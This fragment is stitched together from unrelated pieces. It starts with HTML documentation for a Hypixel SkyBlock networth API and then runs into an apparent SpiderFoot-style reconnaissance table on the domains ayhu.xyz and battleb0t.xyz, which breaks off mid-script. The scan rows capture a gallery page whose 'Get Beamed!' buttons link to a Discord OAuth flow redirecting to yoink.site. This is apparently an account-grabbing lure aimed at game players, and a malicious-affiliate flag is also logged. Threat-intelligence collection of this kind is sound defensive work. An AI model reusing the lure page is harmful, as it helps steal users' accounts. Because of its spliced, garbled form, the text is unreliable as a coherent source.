<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 02:55:27 | BGP AS Membership | No | URLScan.io | 0 | 0 | 1 | 0 | None | 13335 | ayhu.xyz |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.100): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:30 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'35.229.48.116', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'35.229.32.0/19', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 35.229.48.116 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CIEE (Net ID: 00:01:71:0A:18:17) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PeopleMatter (Net ID: 00:18:0A:31:ED:0A) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 1f64fd (Net ID: 00:02:2D:1F:64:FD) | 37.7642, -122.3993 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-109-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-109-153.github.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:8C:21:B2) | 39.0469, -77.4903 |
| 2023-05-12 02:45:06 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:0d:aa:ca:e8:49:20:45:87:cd:d5:1a:54:b2:f3:2b:99:ab:
ae:23:1b:aa:7c:93:d6:0a:57:f8:3f:18:87:31:b9:b4:a0:14:
5a:a3:d7:53:87:49:cc:95:a4:8e:e1:e6:0d:d2:49:89:d0:ab:
31:4a:f6:af:d0:2e:c0:e4:ff:51:6e:cc:42:b1:be:91:7a:44:
1f:34:8a:46:85:68:1e:0e:8a:4d:5e:89:38:d9:54:dc:c4:97:
4b:14:0d:a0:bf:8e:67:b1:f3:85:7e:a2:d3:2c:92:11:5d:ef:
0c:b6:b8:b4:a8:a0:28:c2:c4:e0:0b:b4:93:68:16:12:66:23:
a8:cb:69:a2:bf:1b:22:89:b2:38:bf:df:0d:9e:a1:33:e4:c9:
04:e1:b2:4a:cf:89:24:fc:25:18:33:fc:77:fd:48:86:24:59:
3a:69:44:1d:b2:6f:d2:51:7d:c9:04:e6:d5:a5:b1:f4:cb:92:
e0:9c:0c:cd:c9:a8:1e:1c:c1:a2:77:25:27:2b:d2:9b:00:84:
3f:ea:0e:96:98:b0:aa:91:b8:e1:7d:b2:c3:5e:b2:b9:e1:e4:
fe:26:7c:88:e1:94:ef:f3:1c:16:18:18:f0:eb:aa:97:f4:f5:
93:c9:a9:54:86:73:1d:9c:a1:3a:aa:11:c3:31:83:14:d1:61:
dc:56:91:9e
| battleb0t.xyz |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:8443 | 188.114.97.0/24 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Canada | Toronto, Ontario, ON, Canada, CA |
| 2023-05-12 02:49:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
24:54:79:6e:3c:79:d5:ae:a0:b8:7c:0a:ff:89:93:3d:d6:57:
91:5f:7d:e2:ea:b5:70:87:04:12:dd:cf:ba:db:1a:dd:bf:5f:
7c:c6:d9:18:6d:ca:27:ff:1c:41:bc:85:75:b0:f4:d1:5d:dc:
45:87:06:cb:1f:49:05:31:eb:49:05:f4:6b:36:41:2f:39:66:
bb:c1:2a:07:32:84:55:39:1c:a4:29:9c:55:fc:c5:e4:ad:62:
54:ad:d2:25:f2:67:4f:a1:c0:d0:75:ed:4f:e4:15:2f:b9:2f:
6f:67:f4:2e:dc:7e:0d:b9:75:12:29:49:c3:67:d0:7b:f2:21:
0c:ee:8a:58:d9:43:b2:12:a1:03:39:b0:0e:c1:ea:07:d2:2f:
a3:20:c3:66:05:93:88:53:7a:4d:dc:f9:b6:ec:64:81:b8:41:
97:de:f9:a9:49:80:7b:d7:0d:4d:f9:f4:92:96:1e:c7:cc:e3:
98:1b:07:be:b0:bf:bd:9e:e3:6c:c7:67:ae:92:9a:78:90:eb:
a0:3f:1e:59:bd:f5:c7:ec:43:04:a4:be:44:c3:74:12:39:82:
e0:e3:bf:d9:c2:3b:8e:9a:08:be:3c:f1:c4:88:72:a0:ed:59:
9a:b6:1a:ae:e9:2d:33:e0:ea:a0:55:60:b8:66:48:ca:d5:05:
c4:a4:9b:ca
| battleb0t.xyz |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 3 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IzWcLwqG74V5tV1nWv6NwCgv19x6fOKHH9bpAKGqFvs-1683861861-0-AaT1IDJ8zL-HPKAcS5jW_S_lOAZThpdmCpakWJJZLTdl-YC7YmW7x0R3Esq2ci5pRxETFrXUoScSBrwB5quPRe1171zsRq5FO5HvSBsT8wSH48d6cjZBcafhFd-gYMgKn5vz-FkJUPQ0nF10-q2ubdvcw8hKSSRUsAC4C2bgwDMz0kRykTgIN5O-4hUEH_aIMPUl85RgiecFAuvX8Ivy5H7CWHsXJNLmrFihUW3yur5y4mznmwIt6LoJGKtAduIhk1MMkrSy06zOCVQNVecBCYfPFg-LQUxzu01zND8kx6XIr4D_Z7JCVLT2xHDvC0QW8SVEpEQxyz1_6w4Q_kXekAKzWUv6f2WQc9reLDcoidSiSGME_E1JbznCGlu2Qcv2UxBiUp3ZaVMVnVkjfbD8tvqsMpOiPHRoL0QGNOvZC9IWd3DmNkLVl0o7A7gZ6X6XvmxN8FN6zQ5MuokY1veB1HzJur_7DeYGkiQKi-0P2vRxvm4WDXUmU4f2tq7Esl4HSqC16vv9LBLaBAi8Z_5ASfDKC4_Qtwk5ocpapPABdtQe_KyihhYQ0p3PsebP3qabKmLOkD2fDvF3lYLd3qMvC4RgGh-YX8l7PTUCq3wEfd8Mi9e6YReBeIzcGw5PwaoMHFYsP5RhUMwk71xYoONoQnXtJO45ecOy75oe90Gm07DUOsZsURI3qtJbwRlmpa7xW_oJhMCvGoxCaFBmv4Tj_3i4JWKOMf7hpKtp919xj-jQIAWQmSIDBw3LhMZPRePjKwSZV17PsqlmFxhMjxxo_oGcprk2tlsBrXLDx9NJVWy2DHDR-TPwL1u1-c5lRkjOzwwNIlsSIltqwOI6w4aVA6MdRM9LQlE6JVGhJTOkyMSmOGg0b-gPtNYSVQZ4M0bbvY5ZejvC-622MlBNpTcTQgj-Hr5BRzvJOQNVBtKeZNEcL0V-HlUOqjgsgCuZ0n-_DmccPSp6yXjib7zziw0VsFZ51VNwFMiyAJLSoQVd1OjGuw3fSFPRsqIT0NzkM6LJJ9oyKVkZXep7mdpjCvm52q0byqZXvzL2VDAtJAJmAXjedpHk-ixt-DqOfzQw9GqcICnOaIAwGCalMfoPOf8GPEND9RClu9LRyO_FDNt75C01Varldc5Ftwg8k-rAHBToDSA8_BQdwA01UognhxgoBkv5pTU2f0H6TbryBj0d8lUJpXsYh3CtyN0y8DOT_kz_DjrrzIT964Pdi7AsCCs8mo2IE6lrD73n8Izje7P97pkFkPjlBN2jtfhSvPURw_vpTJ5ZaaFdYA9KK-YFF68xMCw6ewAMK1rkYSoe1oqSv02a9QAvlbxHhD_COD3weHDV-tI_xq_UVBQKGO4fDKE5ZB_Li_qQJ1UU8CLWZeL01WBdYpUyqwj8DSDtW_hWLGQxeKSnHsjkNN44s8ztTjWQa0EOv111zkoc_jo1-AKbBfegf0gXFbeefPUQPApaVp0ZSh976fXDUBkg-u9zIFuO8PmOpT12qOluulzM3HAWuIXPfFdKdkuM_0Ju0J2nYUnPnIIPw7-X0VlO10ISCMaRppc2X6T6WN3Me0ur-AgpXQrtaOHERtZpzl81diItC7rlhoi2hcwlyknYz9uG6Jvt4vO7CVGEkxo64WkJUYfdQcxWDVfCj5P8OtigH5bAFPrPlThHqTc5vpPnWpu_04hxNRR1-yz89uQ30xUpmEOd55phY60kcWBwhTfKO_t_0MJs_4gMTnO_VQemTQRtnrcmjKY2pn8nAizQEc0LX-nJ_4sW5z-DGM44AAFGVM5-U7o0Y7m1jXwg99HdEmqr2iPndrQh3ksnfvVAApgCg0pbwWbA71pkVfyO8vPpUv_GruozMnSwm3sFOR28jhXLHljB6WOMjmilFX-I80iAeT78A5CMWmca6g1quxd5xHVTMFnl-Ys3ieqarC7YmJ7eytJNcbcsYSdnciNL21ndjddEi22yCTG9No7nWap74I3S-XDZ5j0YJh9aMipl2sHc0u1U-Vx2vJmPYYV1MWTS_cbbT2ub5ALyjMgyaSA96qpG_Ooy4cFCkf0E0RRynEWRVadMZE1Vz5bBogaFEOjsc334EAR0zTIX8_4nnRO5mOvEVRo4ZTcKeicbfVjehihRxW1wdSDJAbbGCjjkZj3DldP4NK0vlhWlD9UbhT6NEC6tNcCjkKUECuinurOI-oV4Cegh-51bGD-UpvxqLsfIQd9QODY03eyCxUur045Y22aLoD51JCbhy39Jp0fS35dbrG4QIggvUdxGVolRMemldY1hGoUkHPtE8nB2YB7L2z90pSQRrkz2F1mucH6C2aK0d1BE2f04Z7nAiGFk7bERb053H4pvO-fGR73M06TI9KFQDNVYHk7iyF8yJ8kA23l9FgJhokSfUX3_PYhrtNIdVilfmf2nfkSfGzPgsBbAL-1WUlksPvUQq7Tut8_2gnISEhXjovKigslLYWTdPYupiAliABg3BLe_WNuc41K408YYwipU-2SdiixQBhgUVLS8Sh615rA">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
